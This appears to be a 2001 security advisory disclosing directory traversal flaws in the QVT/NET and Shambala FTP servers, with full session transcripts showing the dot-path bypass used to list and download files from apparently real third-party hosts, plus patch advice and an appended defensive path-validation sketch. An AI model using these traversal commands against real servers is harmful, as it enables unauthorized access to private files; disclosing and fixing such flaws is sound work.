
alt3kx-advisories-2001.txt

06 Jun 2001 | Reported by Alt3kx | Type: packetstorm | Source: packetstormsecurity.com

QVT/NET FTP server vulnerability allows directory traversal and unauthorized file access.

Code
`  
  
======================================================================  
  
QVT/NET 4.3 FTP server Directory Traversal  
  
  
Author: alt3kx! <[email protected]>  
Date: 2001-05-22  
Site: www.raza-mexicana.org  
  
Greet to: _0x90_, dr_fdisk^, Dex, PaTa  
Teams: Raregazz - X-ploit and S0d  
  
vicente F0x no rulas wey!  
======================================================================  
------------------------=[Brief Description]=-------------------------  
  
QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.  
A bug allows any user to change to any directory, list the files in that  
path, and GET them remotely.  
  
----------------------------=[Platforms]=-------------------------------  
  
Windows 9.x  
Windows NT  
Windows 2000  
  
  
-----------------------------=[Summary]=---------------------------------  
  
  
When sending the command "CWD ..." (or "cd ..." in the default FTP  
client), the server will go one directory up.  
  
  
  
Exploit:  
  
  
C:\>ftp server.vulnerable.com  
Connected to server.vulnerable.com.  
220 shell FTP server (QVT/Net 4.3) ready.  
User (server.vulnerable.com:(none)): anonymous  
331 Guest login OK, please send real ident as password.  
Password:  
230 Guest login OK, access restrictions apply.  
ftp> cd ..  
501 CWD command not allowed.  
  
SO THE BUG... ...  
  
ftp>cd .../.../.../.../.../.../  
250 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).  
-rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exe  
drwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6  
drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup  
-rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe  
-rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exe  
drwxrwxrwx 1 nobody system 0 Jan 18 17:44 norton  
drwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Files  
drwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins  
  
.  
.  
.  
.  
  
-rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txt  
drwxrwxrwx 1 nobody system 0 May 4 16:51 XXXX  
drwxrwxrwx 1 nobody system 0 May 8 13:17 teens  
drwxrwxrwx 1 nobody system 0 May 8 13:18 tmp  
-rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt  
226 Transfer complete.  
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.  
  
ftp> get raza-alt3kx.txt  
200 PORT command successful.  
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106)   
(168 bytes).  
226 Transfer complete.  
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.  
ftp>quit  
221 Goodbye.  
  
  
  
C:\>type raza-alt3kx.txt  
  
Bug discovered by alt3kx! <[email protected]>  
  
  
C:\>  
  
  
-------------------------------=[Patch]=---------------------------------  
  
The recommended action is to change the permissions, or to define a  
dedicated directory for anonymous users that contains no sensitive files.  
  
-------------------------=[Company Compromise]=--------------------------  
  
Company:  
  
http://www.qpc.com  
  
  
  
  
  
  
======================================================================  
  
  
Shambala FTP server Directory Traversal  
  
  
Author: alt3kx! <[email protected]>  
Date: 2001-05-22  
Site: www.raza-mexicana.org  
  
Greet to: _0x90_, dr_fdisk^, Dex, PaTa  
Teams: Raregazz - X-ploit and S0d  
  
vicente F0x no rulas weyete!  
======================================================================  
------------------------=[Brief Description]=-------------------------  
  
Shambala FTP Server is an FTP server for Windows 9x/NT/2000.  
A bug allows any user to change to any directory, list the files in that  
path, and GET them remotely.  
  
----------------------------=[Platforms]=-----------------------------  
  
Windows 9.x  
Windows NT  
Windows 2000  
  
  
-----------------------------=[Summary]=---------------------------------  
  
  
When sending the command "CWD ..." (or "cd ..." in the default FTP  
client), the server will go one directory up.  
  
  
  
Exploit:  
  
alt3kx@machine:/tmp$ ftp 1.xx.xx.xx  
Connected to 1.xx.xx.xx.  
220 1.xx.xx.xx - Shambala FTP Server Ready.  
Name (1.xx.xx.xx:Administrator): anonymous  
331 Password required for anonymous.  
Password:  
230 User anonymous logged in.  
ftp> cd ..  
550 Requested action not taken. Permission denied.  
ftp> pwd  
257 "/" is current directory.  
ftp> dir  
200 PORT command successful.  
150 Opening data connection.  
d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx  
---------- owner group 283 21-maj-01 17:55   
index-_-1_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-2_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-3_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-4_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-5_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-6_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-7_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-8_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-9_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-10_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-11_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-12_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-13_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-14_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-15_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-16_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_0_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_0_0_-1.htm  
---------- owner group 283 21-maj-01 17:55 .htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-2.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-3.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-4.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-5.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-6.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-7.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-8.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-9.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-10.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-11.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-12.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_-1_-11.htm  
---------- owner group 283 21-maj-01 18:08   
index-_1_0_-11.htm  
---------- owner group 283 21-maj-01 18:08   
index-_-1_0_-11.htm  
  
226 Transfer complete  
ftp> cd ../  
550 Requested action not taken. Permission denied.  
ftp>  
  
EXPLOIT... ...  
  
ftp> cd /.../.../  
257 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opening data connection.  
---------- owner group 15444 04-maj-01 14:26 SCAN.log  
---------- owner group 140340 04-maj-01 14:05   
MAILS-PRESIDENCIA.txt  
---------- owner group 466944 18-sep-99 09:32 Shambala.exe  
---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG  
---------- owner group 31 21-maj-01 17:50   
passwordsxxx.txt  
d--------- owner group 0 21-maj-01 17:50 Web  
226 Transfer complete.  
ftp>  
  
  
ftp> cd /.../.../.../.../  
257 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opening data connection.  
---------- owner group 246928 18-jan-01 13:10 N6Setup.exe  
d--------- owner group 0 18-jan-01 15:39 Netscape 6  
d--------- owner group 0 18-jan-01 14:50 Netscape 6   
Setup  
---------- owner group 3209110 19-jan-01 10:51 getrgt.exe  
  
.  
.  
.  
.  
.  
  
---------- owner group 168 21-maj-01 19:07   
raza-alt3kx.txt  
  
ftp> get raza-alt3kx.txt  
200 PORT command successful.  
150 Opening data connection.  
226 Transfer complete.  
168 bytes received in 0 seconds (168 bytes/s)  
ftp> quit  
221 Goodbye.  
  
  
alt3kx@machine:/tmp$ cat raza-alt3kx.txt  
  
  
Bug discovered by alt3kx! <[email protected]>  
  
  
alt3kx@machine:/tmp$  
  
  
  
-------------------------------=[Patch]=------------------------------  
  
The recommended action is to change the permissions, or to define a  
dedicated directory for anonymous users that contains no sensitive files.  
  
  
-------------------------=[Company Compromise]=-----------------------  
  
http://www.evolvable.com  
  
  
  
  
  
  
`
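Added example, not part of the original advisory and not either vendor's code: in both sessions above the server refuses `cd ..` but accepts path components made only of dots (`...`). This sketch shows server-side path handling that resolves CWD arguments on the virtual path and refuses any dot-only component. The function names `resolve_virtual`, `to_real` and `rejected` are hypothetical, and it assumes the server keeps a per-session virtual working directory.

```python
import os

class TraversalError(ValueError):
    """A client-supplied path would leave the FTP virtual root."""

def resolve_virtual(cwd, arg):
    """Resolve a CWD/RETR/LIST argument against the session's virtual cwd.

    Only the virtual path is manipulated, so '..' is consumed here and
    never handed to the operating system.
    """
    if "\x00" in arg:
        raise TraversalError("NUL byte in path")
    arg = arg.replace("\\", "/")            # treat both separators alike
    stack = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for part in arg.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:                   # already at the virtual root
                raise TraversalError("'..' above the virtual root")
            stack.pop()
        elif part.strip(". ") == "":        # '...', '....', '.. ' and similar
            raise TraversalError("dot-only component %r" % part)
        else:
            stack.append(part)
    return "/" + "/".join(stack)

def to_real(root, virtual):
    """Map a resolved virtual path under root, then re-check the result
    after the OS has resolved links (defence in depth)."""
    root = os.path.realpath(root)
    real = os.path.realpath(os.path.join(root, *virtual.strip("/").split("/")))
    if os.path.commonpath([root, real]) != root:
        raise TraversalError("resolved path escapes the root")
    return real

def rejected(cwd, arg):
    """True if the request must be refused (e.g. with a 550 reply)."""
    try:
        resolve_virtual(cwd, arg)
        return False
    except TraversalError:
        return True

# Constructed inputs: the two CWD arguments shown in the advisory's sessions.
assert rejected("/", ".../.../.../.../.../.../")
assert rejected("/", "/.../.../")
```

The second check in `to_real` matters because a filter on the request string alone is what failed here: the final decision should be made on the path the operating system actually resolves.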
